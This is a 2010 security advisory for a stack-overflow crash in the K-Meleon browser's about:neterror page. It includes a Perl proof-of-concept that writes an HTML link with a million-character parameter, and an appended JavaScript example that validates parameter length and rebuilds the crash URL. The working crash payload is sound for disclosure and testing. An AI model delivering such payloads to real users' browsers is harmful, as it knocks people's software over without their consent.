K-Meleon for windows about neterror Stack Overflow DoS
Posted on 14 August 2010
======================================================
K-Meleon for windows about neterror Stack Overflow DoS
======================================================

############################################
K-Meleon for windows about:neterror Stack Overflow DoS
Vendor URL: http://kmeleon.sourceforge.net/
Advisory: http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html
Vendor notified: Yes
Exploit available: Yes
Category: Remote DoS
############################################

K-Meleon is an extremely fast, customizable, lightweight web browser based on the Gecko layout engine developed by Mozilla, which is also used by Firefox. K-Meleon is free, open source software released under the GNU General Public License and is designed specifically for Microsoft Windows (Win32) operating systems.

K-Meleon is vulnerable to a crash triggered by a very long URL. Internal pages such as about:neterror do not limit the number of characters a user can put in the 'c' and 'd' parameters, so a suitably malformed URL crashes the browser easily. The issue is exploitable via a web link (a plain "click here" anchor), via window.location.replace('very long url'), or via similar vectors.

#################
Versions Tested
#################
I have tested this issue on Win XP SP3 and a fully patched Windows 7.

Win XP SP3:
K-Meleon 1.5.3 & 1.5.4: vulnerable (crashes)
K-Meleon 1.6.0a4: vulnerable (crashes)

Windows 7 Ultimate:
K-Meleon 1.5.3 & 1.5.4: vulnerable (crashes)
K-Meleon 1.6.0a4: vulnerable (crashes)

############
References
############
Discovered: 29-07-2010
Vendor notified: 31-07-2010
Vendor Response:
Vendor patch:

################
#Proof Of Concept
################
#######################################################################
#!/usr/bin/perl
# K-Meleon Long "a href" Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# K-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS
# Generate the file, open it with K-Meleon, click the link and wait a few seconds
######################################################################
use strict;
use warnings;

my $archivo = $ARGV[0];    # output HTML file name
if (!defined($archivo)) {
    print "Usage: $0 <archivo.html>\n";
    exit 1;
}

my $cabecera = "<html>\n";
# about:neterror link whose 'c' parameter is 1028135 slashes long
my $payload  = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "\">click here if you can :)</a>\n";
my $fin      = "</html>";
my $datos    = $cabecera . $payload . $fin;

# open the output file for writing ('>'), not for reading
open(my $fh, '>', $archivo) or die "Cannot write $archivo: $!";
print $fh $datos;
close($fh);
exit;
################## EOF ######################

##############
Related Links
##############
Vendor bugtracker: http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Possibly related vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Test case: https://bugzilla.mozilla.org/attachment.cgi?id=461776

###################### End #############################

Thanks to Phreak for support and for helping me understand the nature of this bug; thanks to jajoni for testing it on the Windows 7 x64 version.

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what moves the mind....

# Inj3ct0r.com [2010-08-14]
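The bound the advisory says about:neterror lacks, shown as an added example that is neither K-Meleon's nor Mozilla's code: a small parser for the about:neterror?... query string, a check that rejects over-long 'c' and 'd' values before anything downstream renders them, and a builder that produces the same over-long URL the Perl PoC writes into its anchor so the check can be exercised against it. The cap MAX_PARAM_LEN, the function names and the sample URLs are assumptions made for this illustration, not values from the advisory.

```javascript
// Added illustration, not K-Meleon's or Mozilla's code. The cap is an assumed
// value picked for the example; the advisory gives no figure.
const MAX_PARAM_LEN = 1024;

// Parse the query part of an about:neterror URL into a {name: value} map.
// Only the literal about:neterror?name=value&... form used in the advisory
// is handled; anything else yields null.
function parseNetErrorUrl(url) {
  const prefix = 'about:neterror?';
  if (typeof url !== 'string' || !url.startsWith(prefix)) return null;
  const params = {};
  for (const pair of url.slice(prefix.length).split('&')) {
    if (pair === '') continue;
    const eq = pair.indexOf('=');
    const name = eq < 0 ? pair : pair.slice(0, eq);
    const value = eq < 0 ? '' : pair.slice(eq + 1);
    params[name] = value;
  }
  return params;
}

// The missing check: refuse 'c' or 'd' values longer than the cap. Returning
// a reason lets a caller log why an internal-page navigation was dropped.
function checkNetErrorUrl(url, maxLen = MAX_PARAM_LEN) {
  const params = parseNetErrorUrl(url);
  if (params === null) return { ok: false, reason: 'not an about:neterror URL' };
  for (const name of ['c', 'd']) {
    const value = params[name];
    if (value !== undefined && value.length > maxLen) {
      return { ok: false, reason: `parameter '${name}' is ${value.length} chars, cap is ${maxLen}` };
    }
  }
  return { ok: true, reason: '' };
}

// Build the same over-long URL the Perl PoC places in its <a href>
// (1028135 slashes in the 'c' parameter). The advisory's second vector is
// window.location.replace(buildPocUrl()) from a page the victim visits.
function buildPocUrl(count = 1028135) {
  return 'about:neterror?e=connectionFailure&c=' + '/'.repeat(count);
}

// Stand-alone run: a constructed, ordinary-looking error URL passes and the
// PoC URL is rejected.
if (typeof require !== 'undefined' && require.main === module) {
  const benign = 'about:neterror?e=connectionFailure&u=http://example.invalid/&c=UTF-8&d=connection%20failed';
  console.log(checkNetErrorUrl(benign));
  console.log(checkNetErrorUrl(buildPocUrl()));
}
```

The check runs on the raw query value, before any decoding, so an attacker cannot shrink the measured length with percent-encoding tricks; a real fix in the browser would sit where the internal page reads its parameters, which this example only stands in for.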